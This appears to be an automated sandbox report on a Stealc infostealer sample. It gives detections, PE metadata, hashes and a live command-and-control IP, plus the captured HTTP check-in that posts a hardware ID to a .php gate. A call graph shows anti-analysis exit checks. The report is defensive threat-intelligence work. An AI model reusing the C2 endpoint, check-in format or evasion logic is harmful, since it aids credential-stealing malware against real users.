                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpzcufile.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.0000000001072000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpvcafile.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37GD7file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/amfile.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpEyfile.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpjfile.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.37/:yfile.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              http://185.215.113.37/e2b1563c6670f193.php&cfile.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.37
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1523401
                                Start date and time:2024-10-01 15:21:06 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 83
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37/e2b1563c6670f193.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.37

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.948276417564053
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'841'152 bytes
                                MD5:2b6a17cf5d76f7664806991d7619e998
                                SHA1:b32948270dcb41941e0f98122f9c9d48a36c199c
                                SHA256:beb033b6b81e60ed419ba19985a2c7d1ffb6a4bcadf151e4686404079e0c7747
                                SHA512:ce8038b52f4ac00fc86b7f26627f8ce1d5d76e59c81003a0362b3a491ee2a7735a4eedda7cc4541ee1ae6e3b13e6159cd16b3d25c200fec3daaf4f6fb44d19d7
                                SSDEEP:24576:cLdBGtGG1W4UNJXbn4hHdXkoPPdYTngYY/Liz54HHX+kfy0gHOFTXVPZvC6GOgGt:iGjUL2yA2TzURfLgHOFTXBZ6ygG30n
                                TLSH:5C8533763D27536DF1570438A4BF4D286071789168FDD7390B4EE286032FF39AAA84B9
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xa9d000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007F91A0B7EF8Ah
                                psadbw mm3, qword ptr [ebx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edx], cl
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [edi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], cl
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                pop es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x25b0000x22800d7e07e21339300028c84d656894f3be9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x25e0000x2a20000x200e03ca60aa1308976a62da248482959ffunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                rjfivtba0x5000000x19c0000x19b6009fd570f265ca46425e8f17842abc9a63False0.9950053175326649data7.953820033334295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                iwmizbgs0x69c0000x10000x4000bf2f6901a6fde6313b81d77142d7903False0.7978515625data6.103846877771363IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x69d0000x30000x22001cf78f1291e7537f5bb13633162a4e50False0.07146139705882353DOS executable (COM)0.7704688160324733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-01T15:22:01.059735+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649710185.215.113.3780TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 1, 2024 15:21:59.953063011 CEST4971080192.168.2.6185.215.113.37
                                Oct 1, 2024 15:21:59.957982063 CEST8049710185.215.113.37192.168.2.6
                                Oct 1, 2024 15:21:59.958173037 CEST4971080192.168.2.6185.215.113.37
                                Oct 1, 2024 15:21:59.958805084 CEST4971080192.168.2.6185.215.113.37
                                Oct 1, 2024 15:21:59.964143991 CEST8049710185.215.113.37192.168.2.6
                                Oct 1, 2024 15:22:00.649069071 CEST8049710185.215.113.37192.168.2.6
                                Oct 1, 2024 15:22:00.649149895 CEST4971080192.168.2.6185.215.113.37
                                Oct 1, 2024 15:22:00.653525114 CEST4971080192.168.2.6185.215.113.37
                                Oct 1, 2024 15:22:00.658286095 CEST8049710185.215.113.37192.168.2.6
                                Oct 1, 2024 15:22:01.059619904 CEST8049710185.215.113.37192.168.2.6
                                Oct 1, 2024 15:22:01.059735060 CEST4971080192.168.2.6185.215.113.37
                                Oct 1, 2024 15:22:04.634743929 CEST4971080192.168.2.6185.215.113.37

                                HTTP Request Dependency Graph

                                • 185.215.113.37

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649710185.215.113.37801656C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 1, 2024 15:21:59.958805084 CEST89OUTGET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 1, 2024 15:22:00.649069071 CEST203INHTTP/1.1 200 OK
                                Date: Tue, 01 Oct 2024 13:22:00 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 1, 2024 15:22:00.653525114 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAK
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 34 30 39 33 45 31 32 38 35 41 31 33 36 31 34 39 35 32 39 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 2d 2d 0d 0a
                                Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="hwid"774093E1285A1361495298------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="build"doma------AFBAFBKEGCFBGCBFIDAK--
                                Oct 1, 2024 15:22:01.059619904 CEST210INHTTP/1.1 200 OK
                                Date: Tue, 01 Oct 2024 13:22:00 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:09:21:55
                                Start date:01/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x230000
                                File size:1'841'152 bytes
                                MD5 hash:2B6A17CF5D76F7664806991D7619E998
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:8.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:9.7%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
                                  execution_graph 13482 2469f0 13527 232260 13482->13527 13506 246a64 13507 24a9b0 4 API calls 13506->13507 13508 246a6b 13507->13508 13509 24a9b0 4 API calls 13508->13509 13510 246a72 13509->13510 13511 24a9b0 4 API calls 13510->13511 13512 246a79 13511->13512 13513 24a9b0 4 API calls 13512->13513 13514 246a80 13513->13514 13679 24a8a0 13514->13679 13516 246b0c 13683 246920 GetSystemTime 13516->13683 13517 246a89 13517->13516 13520 246ac2 OpenEventA 13517->13520 13522 246af5 CloseHandle Sleep 13520->13522 13523 246ad9 13520->13523 13524 246b0a 13522->13524 13526 246ae1 CreateEventA 13523->13526 13524->13517 13526->13516 13880 2345c0 13527->13880 13529 232274 13530 2345c0 2 API calls 13529->13530 13531 23228d 13530->13531 13532 2345c0 2 API calls 13531->13532 13533 2322a6 13532->13533 13534 2345c0 2 API calls 13533->13534 13535 2322bf 13534->13535 13536 2345c0 2 API calls 13535->13536 13537 2322d8 13536->13537 13538 2345c0 2 API calls 13537->13538 13539 2322f1 13538->13539 13540 2345c0 2 API calls 13539->13540 13541 23230a 13540->13541 13542 2345c0 2 API calls 13541->13542 13543 232323 13542->13543 13544 2345c0 2 API calls 13543->13544 13545 23233c 13544->13545 13546 2345c0 2 API calls 13545->13546 13547 232355 13546->13547 13548 2345c0 2 API calls 13547->13548 13549 23236e 13548->13549 13550 2345c0 2 API calls 13549->13550 13551 232387 13550->13551 13552 2345c0 2 API calls 13551->13552 13553 2323a0 13552->13553 13554 2345c0 2 API calls 13553->13554 13555 2323b9 13554->13555 13556 2345c0 2 API calls 13555->13556 13557 2323d2 13556->13557 13558 2345c0 2 API calls 13557->13558 13559 2323eb 13558->13559 13560 2345c0 2 API calls 13559->13560 13561 232404 13560->13561 13562 2345c0 2 API calls 13561->13562 13563 23241d 13562->13563 13564 2345c0 2 API calls 13563->13564 13565 232436 13564->13565 13566 2345c0 2 API calls 13565->13566 13567 23244f 13566->13567 13568 2345c0 2 API calls 13567->13568 13569 232468 13568->13569 13570 2345c0 2 API calls 13569->13570 13571 232481 13570->13571 13572 2345c0 2 API calls 13571->13572 13573 23249a 13572->13573 13574 2345c0 2 API calls 13573->13574 13575 2324b3 13574->13575 13576 2345c0 2 API calls 13575->13576 13577 2324cc 13576->13577 13578 2345c0 2 API calls 13577->13578 13579 2324e5 13578->13579 13580 2345c0 2 API calls 13579->13580 13581 2324fe 13580->13581 13582 2345c0 2 API calls 13581->13582 13583 232517 13582->13583 13584 2345c0 2 API calls 13583->13584 13585 232530 13584->13585 13586 2345c0 2 API calls 13585->13586 13587 232549 13586->13587 13588 2345c0 2 API calls 13587->13588 13589 232562 13588->13589 13590 2345c0 2 API calls 13589->13590 13591 23257b 13590->13591 13592 2345c0 2 API calls 13591->13592 13593 232594 13592->13593 13594 2345c0 2 API calls 13593->13594 13595 2325ad 13594->13595 13596 2345c0 2 API calls 13595->13596 13597 2325c6 13596->13597 13598 2345c0 2 API calls 13597->13598 13599 2325df 13598->13599 13600 2345c0 2 API calls 13599->13600 13601 2325f8 13600->13601 13602 2345c0 2 API calls 13601->13602 13603 232611 13602->13603 13604 2345c0 2 API calls 13603->13604 13605 23262a 13604->13605 13606 2345c0 2 API calls 13605->13606 13607 232643 13606->13607 13608 2345c0 2 API calls 13607->13608 13609 23265c 13608->13609 13610 2345c0 2 API calls 13609->13610 13611 232675 13610->13611 13612 2345c0 2 API calls 13611->13612 13613 23268e 13612->13613 13614 249860 13613->13614 13885 249750 GetPEB 13614->13885 13616 249868 13617 249a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13616->13617 13618 24987a 13616->13618 13619 249af4 GetProcAddress 13617->13619 13620 249b0d 13617->13620 13623 24988c 21 API calls 13618->13623 13619->13620 13621 249b46 13620->13621 13622 249b16 GetProcAddress GetProcAddress 13620->13622 13624 249b4f GetProcAddress 13621->13624 13625 249b68 13621->13625 13622->13621 13623->13617 13624->13625 13626 249b71 GetProcAddress 13625->13626 13627 249b89 13625->13627 13626->13627 13628 246a00 13627->13628 13629 249b92 GetProcAddress GetProcAddress 13627->13629 13630 24a740 13628->13630 13629->13628 13631 24a750 13630->13631 13632 246a0d 13631->13632 13633 24a77e lstrcpy 13631->13633 13634 2311d0 13632->13634 13633->13632 13635 2311e8 13634->13635 13636 231217 13635->13636 13637 23120f ExitProcess 13635->13637 13638 231160 GetSystemInfo 13636->13638 13639 231184 13638->13639 13640 23117c ExitProcess 13638->13640 13641 231110 GetCurrentProcess VirtualAllocExNuma 13639->13641 13642 231141 ExitProcess 13641->13642 13643 231149 13641->13643 13886 2310a0 VirtualAlloc 13643->13886 13646 231220 13890 2489b0 13646->13890 13649 231249 13650 23129a 13649->13650 13651 231292 ExitProcess 13649->13651 13652 246770 GetUserDefaultLangID 13650->13652 13653 246792 13652->13653 13654 2467d3 13652->13654 13653->13654 13655 2467b7 ExitProcess 13653->13655 13656 2467c1 ExitProcess 13653->13656 13657 2467a3 ExitProcess 13653->13657 13658 2467ad ExitProcess 13653->13658 13659 2467cb ExitProcess 13653->13659 13660 231190 13654->13660 13661 2478e0 3 API calls 13660->13661 13662 23119e 13661->13662 13663 2311cc 13662->13663 13664 247850 3 API calls 13662->13664 13667 247850 GetProcessHeap RtlAllocateHeap GetUserNameA 13663->13667 13665 2311b7 13664->13665 13665->13663 13666 2311c4 ExitProcess 13665->13666 13668 246a30 13667->13668 13669 2478e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13668->13669 13670 246a43 13669->13670 13671 24a9b0 13670->13671 13892 24a710 13671->13892 13673 24a9c1 lstrlen 13675 24a9e0 13673->13675 13674 24aa18 13893 24a7a0 13674->13893 13675->13674 13677 24a9fa lstrcpy lstrcat 13675->13677 13677->13674 13678 24aa24 13678->13506 13680 24a8bb 13679->13680 13681 24a90b 13680->13681 13682 24a8f9 lstrcpy 13680->13682 13681->13517 13682->13681 13897 246820 13683->13897 13685 24698e 13686 246998 sscanf 13685->13686 13926 24a800 13686->13926 13688 2469aa SystemTimeToFileTime SystemTimeToFileTime 13689 2469e0 13688->13689 13690 2469ce 13688->13690 13692 245b10 13689->13692 13690->13689 13691 2469d8 ExitProcess 13690->13691 13693 245b1d 13692->13693 13694 24a740 lstrcpy 13693->13694 13695 245b2e 13694->13695 13928 24a820 lstrlen 13695->13928 13698 24a820 2 API calls 13699 245b64 13698->13699 13700 24a820 2 API calls 13699->13700 13701 245b74 13700->13701 13932 246430 13701->13932 13704 24a820 2 API calls 13705 245b93 13704->13705 13706 24a820 2 API calls 13705->13706 13707 245ba0 13706->13707 13708 24a820 2 API calls 13707->13708 13709 245bad 13708->13709 13710 24a820 2 API calls 13709->13710 13711 245bf9 13710->13711 13941 2326a0 13711->13941 13719 245cc3 13720 246430 lstrcpy 13719->13720 13721 245cd5 13720->13721 13722 24a7a0 lstrcpy 13721->13722 13723 245cf2 13722->13723 13724 24a9b0 4 API calls 13723->13724 13725 245d0a 13724->13725 13726 24a8a0 lstrcpy 13725->13726 13727 245d16 13726->13727 13728 24a9b0 4 API calls 13727->13728 13729 245d3a 13728->13729 13730 24a8a0 lstrcpy 13729->13730 13731 245d46 13730->13731 13732 24a9b0 4 API calls 13731->13732 13733 245d6a 13732->13733 13734 24a8a0 lstrcpy 13733->13734 13735 245d76 13734->13735 13736 24a740 lstrcpy 13735->13736 13737 245d9e 13736->13737 14667 247500 GetWindowsDirectoryA 13737->14667 13740 24a7a0 lstrcpy 13741 245db8 13740->13741 14677 234880 13741->14677 13743 245dbe 14822 2417a0 13743->14822 13745 245dc6 13746 24a740 lstrcpy 13745->13746 13747 245de9 13746->13747 13748 231590 lstrcpy 13747->13748 13749 245dfd 13748->13749 14838 235960 13749->14838 13751 245e03 14982 241050 13751->14982 13753 245e0e 13754 24a740 lstrcpy 13753->13754 13755 245e32 13754->13755 13756 231590 lstrcpy 13755->13756 13757 245e46 13756->13757 13758 235960 34 API calls 13757->13758 13759 245e4c 13758->13759 14986 240d90 13759->14986 13761 245e57 13762 24a740 lstrcpy 13761->13762 13763 245e79 13762->13763 13764 231590 lstrcpy 13763->13764 13765 245e8d 13764->13765 13766 235960 34 API calls 13765->13766 13767 245e93 13766->13767 14993 240f40 13767->14993 13769 245e9e 13770 231590 lstrcpy 13769->13770 13771 245eb5 13770->13771 14998 241a10 13771->14998 13773 245eba 13774 24a740 lstrcpy 13773->13774 13775 245ed6 13774->13775 15342 234fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13775->15342 13777 245edb 13778 231590 lstrcpy 13777->13778 13779 245f5b 13778->13779 15349 240740 13779->15349 13781 245f60 13782 24a740 lstrcpy 13781->13782 13783 245f86 13782->13783 13784 231590 lstrcpy 13783->13784 13785 245f9a 13784->13785 13786 235960 34 API calls 13785->13786 13787 245fa0 13786->13787 13881 2345d1 RtlAllocateHeap 13880->13881 13883 234621 VirtualProtect 13881->13883 13883->13529 13885->13616 13888 2310c2 codecvt 13886->13888 13887 2310fd 13887->13646 13888->13887 13889 2310e2 VirtualFree 13888->13889 13889->13887 13891 231233 GlobalMemoryStatusEx 13890->13891 13891->13649 13892->13673 13894 24a7c2 13893->13894 13895 24a7ec 13894->13895 13896 24a7da lstrcpy 13894->13896 13895->13678 13896->13895 13898 24a740 lstrcpy 13897->13898 13899 246833 13898->13899 13900 24a9b0 4 API calls 13899->13900 13901 246845 13900->13901 13902 24a8a0 lstrcpy 13901->13902 13903 24684e 13902->13903 13904 24a9b0 4 API calls 13903->13904 13905 246867 13904->13905 13906 24a8a0 lstrcpy 13905->13906 13907 246870 13906->13907 13908 24a9b0 4 API calls 13907->13908 13909 24688a 13908->13909 13910 24a8a0 lstrcpy 13909->13910 13911 246893 13910->13911 13912 24a9b0 4 API calls 13911->13912 13913 2468ac 13912->13913 13914 24a8a0 lstrcpy 